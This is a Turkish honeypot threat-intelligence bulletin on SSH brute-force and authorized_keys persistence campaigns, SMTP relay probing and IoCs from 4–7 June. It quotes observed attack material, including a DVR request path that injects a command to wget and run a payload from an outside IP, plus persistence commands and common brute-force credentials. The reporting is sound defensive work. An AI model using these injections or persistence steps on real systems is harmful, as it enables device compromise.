Bülten 4–7 Haziran: Romanya Kaynaklı SSH Persistence Kuyruğu ve Düşmeyen SMTP/SOSTREA İzleri
4–7 Haziran penceresinde 3.39M ham event görüldü. 5 Haziran tek başına 1.84M event ile dönem zirvesi oldu. Romanya kaynaklı iki IP, SSH brute-force sonrası authorized_keys persistence davranışını sürdürdü; SMTP ve SOSTREA düşük hacimde ama kalıcı kaldı.
Analiz: Erdem Özyurt · SiberKale Tellal
İçindekiler 14
- Yönetici Özeti
- Günlük Dağılım — 5 Haziran Tek Başına Pencerenin Yarısı
- 1. Ana Aktör: Romanya Kaynaklı İki IP Aynı Playbook’u Taşıyor
- 2. SSH Davranışı: authorized_keys Hâlâ Ana Kalıcılık Yolu
- Post-auth Komut Zinciri
- 3. Suricata: SSH ve Web Probe Aynı Hat Üzerinde
- 4. SMTP: Büyük Dönüş Değil, Düşmeyen Kuyruk
- Savunma Notu
- 5. SOSTREA/TBK: Ana Dalga Değil, Ama İmza Yaşıyor
- 6. Public API Göstergeleri: Feed Yeniden Yaşıyor
- IoC Tablosu — 4–7 Haziran Penceresi
- Savunma Öncelikleri
- Sonuç
- Metodoloji ve Lisans
Yönetici Özeti
3 Haziran bülteni SSH persistence dalgasını, SMTP open-relay aramasının geri dönüşünü ve SOSTREA/TBK kuyruğunu raporlamıştı. 4–7 Haziran penceresi bu tablonun bitmediğini gösteriyor. Hacim 5 Haziran’da yeniden yükseldi; fakat bu kez manzara daha dar bir aktör kümesine sıkıştı: Romanya kaynaklı iki IP, SSH oturumları, pasif fingerprint verisi, IDS sinyali ve post-auth komut davranışıyla dönemin ana eksenini oluşturdu.
Bu yazı ham sensör loglarından üretildi. P0f kayıtları toplam hacme dahil edildi; çünkü bu pencerede saldırı altyapısının oturum hacmini anlamak için pasif fingerprint verisi önemli bir bağlam sağlıyor. Ancak davranış yorumu Cowrie, Suricata, Fatt, Mailoney ve Tanner sinyalleriyle çaprazlandı. Public API tarafı aynı dönemde veri yazmaya devam etti; son ölçümde toplam IoC sayısı 47.198, son 7 gün IoC sayısı 3.783 olarak göründü.
Bu bülten OPSEC-filtreli ham sensör logları ve public API göstergeleri üzerinden hazırlanmıştır. Ham log toplamları ile anlık API sayaçları birebir aynı okunmamalıdır; iki kaynak farklı toplama ve zenginleştirme katmanlarından geçer.
Günlük Dağılım — 5 Haziran Tek Başına Pencerenin Yarısı
| Tarih | Ham Event | P0f | Suricata | Cowrie | Fatt | Mailoney | Tanner | Not |
|---|---|---|---|---|---|---|---|---|
| 4 Haz | 708.055 | 255.731 | 120.917 | 174.340 | 43.085 | 2.838 | 2.895 | SSH sonrası baseline yüksek |
| 5 Haz | 1.839.174 | 1.164.797 | 351.107 | 169.587 | 34.798 | 1.391 | 840 | Dönem zirvesi |
| 6 Haz | 407.584 | 163.635 | 51.122 | 27.437 | 7.055 | 2.015 | 998 | Hacim düşüyor, SMTP korunuyor |
| 7 Haz | 432.664 | 204.449 | 67.454 | 72.610 | 15.602 | 2.000 | 600 | SSH yeniden belirginleşiyor |
5 Haziran’daki 1.84M event, dört günlük pencerenin en keskin kırılması. Bu artış tek bir potun ölçüm hatası gibi görünmüyor. Aynı gün P0f, Suricata ve Cowrie birlikte yükseldi. Bu nedenle 5 Haziran’ı “gürültü” diye kenara ayırmak yerine, oturum açma denemesi, TCP/SSH fingerprint’i ve IDS sinyalinin birlikte büyüdüğü bir kampanya günü olarak okumak daha doğru.
Buna rağmen pencere sadece 5 Haziran’dan ibaret değil. 7 Haziran’da Cowrie yeniden 72K seviyesine çıktı. Bu, 3 Haziran bültenindeki “persistence kuyruğu sürüyor” tespitini güçlendiriyor: dalga bitmiyor, sadece hacmini ve kaynak dağılımını değiştiriyor.
1. Ana Aktör: Romanya Kaynaklı İki IP Aynı Playbook’u Taşıyor
Dönemin en baskın iki kaynağı aynı ağ/operatör bağlamında göründü:
| IP | Event | Ülke | ASN/Operatör | Davranış |
|---|---|---|---|---|
193.32.162.34 | 691.978 | RO | Unmanaged Ltd | SSH brute-force + persistence + fingerprint |
193.32.162.35 | 282.904 | RO | Unmanaged Ltd | Aynı playbook, daha düşük hacim |
Bu iki IP toplamda yaklaşık 975K event üretti. Dağılımı da dikkat çekici:
| IP | P0f | Cowrie | Suricata | Fatt |
|---|---|---|---|---|
193.32.162.34 | 279.244 | 254.120 | 108.190 | 50.424 |
193.32.162.35 | 108.518 | 106.045 | 47.238 | 21.103 |
Bu tablo tekil bir port taramasından daha fazlasını söylüyor. P0f oturum yoğunluğunu, Cowrie SSH/Telnet etkileşimini, Suricata ağ imzalarını, Fatt ise protokol oturum bağlamını veriyor. Dört sinyal aynı iki kaynakta birleştiğinde elimizde yalnızca “çok istek atan IP” değil, belirgin davranış deseni olan bir kampanya kümesi kalıyor.
Bu aktör ailesi yalnızca parola denemiyor. Başarılı oturum yakaladığında sistem bilgisini topluyor, .ssh dizinini hazırlıyor ve authorized_keys üzerinden kalıcılık kurmaya çalışıyor. Savunma tarafında başarısız login alarmı tek başına eksik kalır; post-auth komut zinciri ayrı korelasyon konusu olmalıdır.
2. SSH Davranışı: authorized_keys Hâlâ Ana Kalıcılık Yolu
Cowrie tarafında 4–7 Haziran arasında 444.284 event görüldü. Başarısız login sözlüğü yine klasik Linux/DevOps yüzeyine yüklendi:
| Kullanıcı adı | Başarısız deneme |
|---|---|
root | 12.782 |
deploy | 2.884 |
admin | 2.794 |
ubuntu | 2.701 |
dev | 2.547 |
oracle | 2.406 |
user | 1.821 |
mysql | 1.353 |
hadoop | 1.201 |
support | 1.058 |
| Parola | Başarısız deneme |
|---|---|
123456 | 4.543 |
12345678 | 2.232 |
password | 1.939 |
123 | 1.371 |
1234 | 1.271 |
12345 | 1.223 |
root | 1.191 |
admin | 1.089 |
support | 1.035 |
admin123 | 699 |
Başarılı oturum tarafında root, admin, user, test, ubuntu, git, solana, ethereum gibi kullanıcı adları öne çıktı. Bu liste iki ayrı ilgiyi birleştiriyor: klasik Linux sunucu hesapları ve daha önceki bültenlerde gördüğümüz kripto/validator temalı kullanıcı adları.
Post-auth Komut Zinciri
En sık görülen komutlar, saldırganın sisteme “girdi mi, nerede, ne kadar güçlü, kalıcılık bırakabilir mi?” sorularını hızlıca yanıtladığını gösteriyor:
| Komut / davranış | Hit | Yorum |
|---|---|---|
/bin/./uname -s -v -n -r -m | 362 | Kernel/OS parmak izi |
cd ~; chattr -ia .ssh; lockr -ia .ssh | 301 | .ssh hazırlığı, immutable/lock kaldırma |
cat /proc/cpuinfo ... | 262+ | CPU/VM kapasite keşfi |
crontab -l | 262 | Kalıcılık noktası kontrolü |
df -h, free -m, lscpu, top, w | 262+ | Kaynak ve oturum keşfi |
rm -rf /tmp/secure.sh; ... pkill ... | 93 | Rakip/önceki payload temizleme izlenimi |
Dosya indirme olayları bu yorumu güçlendiriyor. 4–7 Haziran arasında 395 cowrie.session.file_download kaydı oluştu. Bunların 297’si aynı SHA-256 değerine sahipti ve hedef dosya çoğunlukla authorized_keys oldu.
| Gözlem | Değer |
|---|---|
authorized_keys hedefli kayıtlar | 297+ |
/root/.ssh/authorized_keys hedefleri | 103 |
/etc/hosts.deny hedefleri | 90 |
| En sık SHA-256 | a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 |
| İkinci SHA-256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
01ba4719... hash’i Nisan ortasında da öne çıkan SSH dropper/persistence ailesindendi. Haziran penceresinde yeniden görünmesi, bazı kampanya bileşenlerinin tek seferlik olmadığını; aralıklı, düşük hacimli tekrarlarla yaşamaya devam ettiğini gösteriyor.
3. Suricata: SSH ve Web Probe Aynı Hat Üzerinde
Suricata 4–7 Haziran arasında 723.659 event üretti. En sık imzalar şöyle:
| İmza | Alert | Yorum |
|---|---|---|
ET INFO CURL User Agent | 15.122 | Otomasyon / script tabanlı HTTP denemeleri |
ET SCAN Potential SSH Scan | 12.446 | SSH kampanyasıyla uyumlu |
ET HUNTING HTTP Request Body Longer Than Content-Length Specifies | 5.001 | Bozuk/şüpheli HTTP request gövdeleri |
ET INFO Login Credentials Possibly Passed in POST Data | 5.001 | Web login/probe denemeleri |
ET INFO SSH session in progress on Expected Port | 4.945 | SSH oturum yoğunluğu |
ET INFO SSH-2.0-Go version string Observed | 4.415 | Go tabanlı scanner/bot parmak izi |
ET INFO Request to Hidden Environment File - Inbound | 2.715 | .env avcılığı |
Port dağılımı dönemin yüzeyini netleştiriyor:
| Port | Suricata Event | Bağlam |
|---|---|---|
| 22 | 293.117 | SSH ana gövde |
| 443 | 110.233 | HTTPS probe |
| 80 | 93.773 | HTTP probe |
| 8080 | 76.248 | Alternatif web yüzeyi |
| 25 | 12.748 | SMTP |
| 3306 | 1.732 | MySQL düşük hacimli |
Mayıs başındaki MSSQL benzeri bir veri tabanı mega-probe’u bu pencerede yok. MySQL 3306 arka planda kalmış durumda. Asıl yoğunluk SSH ve web yüzeyi arasında bölünüyor. .env avcılığı, login form denemeleri ve curl user-agent imzaları, web tarafında da otomatik keşfin sürdüğünü gösteriyor.
4. SMTP: Büyük Dönüş Değil, Düşmeyen Kuyruk
Mailoney 4–7 Haziran penceresinde 8.240 event üretti. Bu hacim 2 Haziran’daki zirve kadar keskin değil; ancak open-relay aramasının tamamen sönmediğini gösteriyor.
| Kaynak IP | Mailoney Event | Bağlam |
|---|---|---|
102.220.160.99 | 3.448 | Önceki bültende de ana SMTP aktörü |
158.94.210.190 | 2.836 | Open-relay ailesiyle uyumlu |
91.92.240.42 | 981 | Kuyruk aktör |
178.16.53.230 | 656 | Kuyruk aktör |
103.210.238.154 | 96 | Düşük hacim |
Burada önemli olan hacimden çok süreklilik. SMTP aktörleri kısa bir patlama yapıp tamamen kaybolmuyor; aynı kaynaklar veya yakın davranış ailesi birkaç gün sonra yeniden düşük/orta hacimle dönüyor. Mail gateway savunmasında “son 24 saat sakin” ölçütü tek başına güven vermez.
Savunma Notu
SMTP için asgari kontrol seti değişmiyor:
- Open relay testleri düzenli yapılmalı.
- Port 25 ve 587 farklı policy ile izlenmeli.
- Başarısız
RCPT TOdenemeleri IP/ASN bazında gruplanmalı. - SPF/DKIM/DMARC doğru olsa bile relay yanlış konfigürasyonu ayrı risk olarak ele alınmalı.
5. SOSTREA/TBK: Ana Dalga Değil, Ama İmza Yaşıyor
Tanner 4–7 Haziran arasında 5.359 event üretti. En dikkat çekici path yine SOSTREA marker’ını taşıyor:
/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp; rm bbc; wget http://169.40.104.99/bbc; chmod 777 bbc; ./bbc
Bu path 356 kez görüldü. Bu sayı önceki büyük DVR/RCE dalgalarına göre düşük; fakat imza değeri yüksek. Aynı payload marker’ının haftalar boyunca düşük hacimde yaşaması, aktörün hedef listesini tamamen terk etmediğini gösteriyor.
SOSTREA bu pencerede manşet değil. Buna rağmen path ve payload biçimi sabit kaldığı için alarm listesinde tutulmalı. Bazı kampanyalar yüksek hacimle değil, uzun ömürlü marker'larla yakalanır.
6. Public API Göstergeleri: Feed Yeniden Yaşıyor
Ham sensör penceresinin yanında public API de veri yazmaya devam etti. Son ölçümde görünen tablo:
| Metrik | Değer |
|---|---|
| Toplam IoC | 47.198 |
| Bugün eklenen/görülen IoC | 434 |
| Son 7 gün IoC | 3.783 |
| Ortalama tehdit skoru | 15.8 |
| Benzersiz ASN | 3.644 |
Top ülkeler ve portlar da genel yönü destekliyor:
| Ülke | IoC |
|---|---|
| US | 11.008 |
| BR | 4.640 |
| CN | 4.500 |
| TR | 1.738 |
| DE | 1.501 |
| Port | IoC |
|---|---|
| 22 | 7.117 |
| 80 | 6.704 |
| 443 | 3.735 |
| 53 | 1.395 |
| 123 | 1.266 |
| 21 | 925 |
| 3306 | 893 |
| 3389 | 656 |
API tarafındaki port sıralaması ham sensör bulgusuyla uyumlu: SSH, HTTP ve HTTPS üstte. DNS/NTP/FTP/RDP gibi servisler arka plan tarama yüzeyi olarak kalmaya devam ediyor.
IoC Tablosu — 4–7 Haziran Penceresi
| IoC | Tür | Bağlam | Öncelik |
|---|---|---|---|
193.32.162.34 | IP | Romanya kaynaklı SSH persistence ana aktörü | high |
193.32.162.35 | IP | Aynı küme, aynı playbook | high |
46.101.184.11 | IP | DigitalOcean kaynaklı P0f/Suricata/Fatt yoğunluğu | medium |
78.174.208.214 | IP | TR kaynaklı P0f/Suricata yoğunluğu | medium |
185.177.72.16 | IP | Bucklog SARL web/IDS kümesi | medium |
185.177.72.51 | IP | Bucklog SARL web/IDS kümesi | medium |
101.47.29.104 | IP | Byteplus kaynaklı P0f/Suricata/Tanner görünümü | medium |
158.94.210.190 | IP | SMTP open-relay kuyruğu | medium |
102.220.160.99 | IP | SMTP ana aktör, önceki bültenle süreklilik | high |
a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 | SHA-256 | authorized_keys hedefli persistence içeriği | high |
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b | SHA-256 | Nisan’dan dönen persistence/dropper marker’ı | medium |
169.40.104.99/bbc | URL path | SOSTREA/TBK payload yolu | high |
ET SCAN Potential SSH Scan | IDS | SSH scan/persistence bağlamı | medium |
ET INFO SSH-2.0-Go version string Observed | IDS | Go tabanlı scanner/bot parmak izi | medium |
ET INFO Request to Hidden Environment File - Inbound | IDS | .env avcılığı | medium |
IOC’lar savunma amaçlı paylaşılır. Tekil IP engelleme kısa vadeli fayda sağlayabilir; ancak bu pencerenin asıl dersi IP değil davranıştır: başarılı login sonrası authorized_keys, .ssh hazırlığı, sistem fingerprint’i ve web/SMTP kuyruğunun birlikte izlenmesi gerekir.
Savunma Öncelikleri
Bu pencere için önerilen öncelik sırası:
- SSH post-auth izleme: Başarılı login sonrası ilk 60 saniyede
authorized_keys,chattr,crontab,/tmp,/dev/shm,uname,cpuinfokomut zincirlerini korele edin. - Key-only SSH: Password auth ve root login kapalı olmalı. Mecburi parola kullanan sistemlerde MFA, allowlist ve rate-limit birlikte uygulanmalı.
- Web yüzeyi temizliği:
.env, login form, phpinfo ve bozuk Content-Length istekleri IDS/SIEM tarafında ayrı kategori olmalı. - SMTP relay kontrolü: Open-relay testleri periyodik yapılmalı;
RCPT TObaşarısızlıkları kaynak ASN ile gruplanmalı. - IoT/DVR marker takibi: SOSTREA/TBK düşük hacimde bile tutulmalı; çünkü path marker’ı attribution açısından uzun ömürlü.
Sonuç
4–7 Haziran penceresi, önceki bültenin devam cümlesi gibi okunmalı: SSH persistence kampanyası bitmedi, sadece daha dar ve yoğun bir kaynak kümesine toplandı. Romanya kaynaklı iki IP, dönemin ana aktörü oldu. 5 Haziran’daki 1.84M event zirvesi, SSH oturumları ve IDS sinyalleriyle birlikte geldi.
SMTP ve SOSTREA tarafında büyük patlama yok; fakat ikisi de “kapandı” denecek kadar sessiz değil. Özellikle SOSTREA path’inin haftalar sonra hâlâ görünmesi, düşük hacimli kampanyaların uzun süre izlenmesi gerektiğini hatırlatıyor.
Savunma tarafı için ana mesaj değişmedi: başarısız login sayacı tek başına yeterli değil. Saldırganın başarılı oturumdan sonraki ilk dakikası, çoğu zaman kampanyanın gerçek niyetini anlatıyor.
Metodoloji ve Lisans
Bu rapor 4–7 Haziran 2026 arası Tellal honeypot ağında toplanan ham logların OPSEC-filtreli analiziyle hazırlandı. Dahili IP’ler, yönetim trafiği, RFC1918/CGNAT ve bilinen operasyonel kaynaklar public yayından çıkarılmıştır.
Lisans: CC BY 4.0 — Atıf yapılarak serbestçe kullanılabilir. IOC’lar CC0 lisansı altında serbesttir. SiberKale Tellal — Threat Intelligence Feed · tellal.net